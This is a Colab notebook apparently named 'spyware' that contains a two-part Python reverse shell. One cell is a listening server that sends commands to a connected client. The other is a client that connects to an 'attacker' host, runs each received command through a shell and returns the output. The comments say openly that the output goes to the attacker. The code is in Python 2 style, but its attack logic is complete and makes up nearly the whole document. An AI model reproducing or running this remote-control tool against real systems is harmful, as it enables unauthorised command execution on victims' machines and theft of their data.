<a href="https://colab.research.google.com/github/vvvvvvss/spyware/blob/main/spyware.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [1]:
pip install watchdog requests python-dotenv

     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 41.9/41.9 kB 635.1 kB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 79.3/79.3 kB 2.0 MB/s eta 0:00:00


In [ ]:
import socket

HOST = '0.0.0.0'  # server will bind to any IP
PORT = 12345

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # creates server TCP socket
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # prevents from getting timeout issues
server_socket.bind((HOST, PORT))

server_socket.listen(5)  # 5 connections max in queue
print("\n[*] Listening on port " +str(PORT)+ ", waiting for connexions.")

# see socket documentation to understand how socket.accept works
client_socket, (client_ip, client_port) = server_socket.accept()
print("[*] Client " +client_ip+ " connected.\n")


while True:
    try:
        command = raw_input(client_ip+ ">")
        if(len(command.split()) != 0):
            client_socket.send(command)
        else:
            continue
    except(EOFError):
            print("Invalid input, type 'help' to get a list of implemented commands.\n")
            continue

    if(command == "quit"):
        break

    data = client_socket.recv(1024)
    print(data + "\n")

client_socket.close()



[*] Listening on port 12345, waiting for connexions.


In [ ]:
import socket
import subprocess, os

HOST = "localhost"  # attacker's IP adress (this is a random one, just to show you)
PORT = 12345 # attacker's port on which server is listening

# same syntax here as for the server
connexion_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connexion_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
connexion_socket.connect((HOST, PORT))
print("\n[*] Connected to " +HOST+ " on port " +str(PORT)+ ".\n")

while True:

    command = connexion_socket.recv(1024)
    split_command = command.split()
    print("Received command : " +command)

    # if its quit, then break out and close socket
    if command == "quit":
        break

    if(command.split()[0] == "cd"):
            if len(command.split()) == 1:
                connexion_socket.send((os.getcwd()))
            elif len(command.split()) == 2:
                try:
                    os.chdir(command.split()[1])
                    connexion_socket.send(("Changed directory to " + os.getcwd()))
                except(WindowsError):
                    connexion_socket.send(str.encode("No such directory : " +os.getcwd()))

    else:
        # do shell command
        proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        # read output
        stdout_value = proc.stdout.read() + proc.stderr.read()
        print(stdout_value + "\n")
        # send output to attacker
        if(stdout_value != ""):
            connexion_socket.send(stdout_value)  # renvoit l'output  à l'attaquant
        else:
            connexion_socket.send(command+ " does not return anything")


connexion_socket.close()
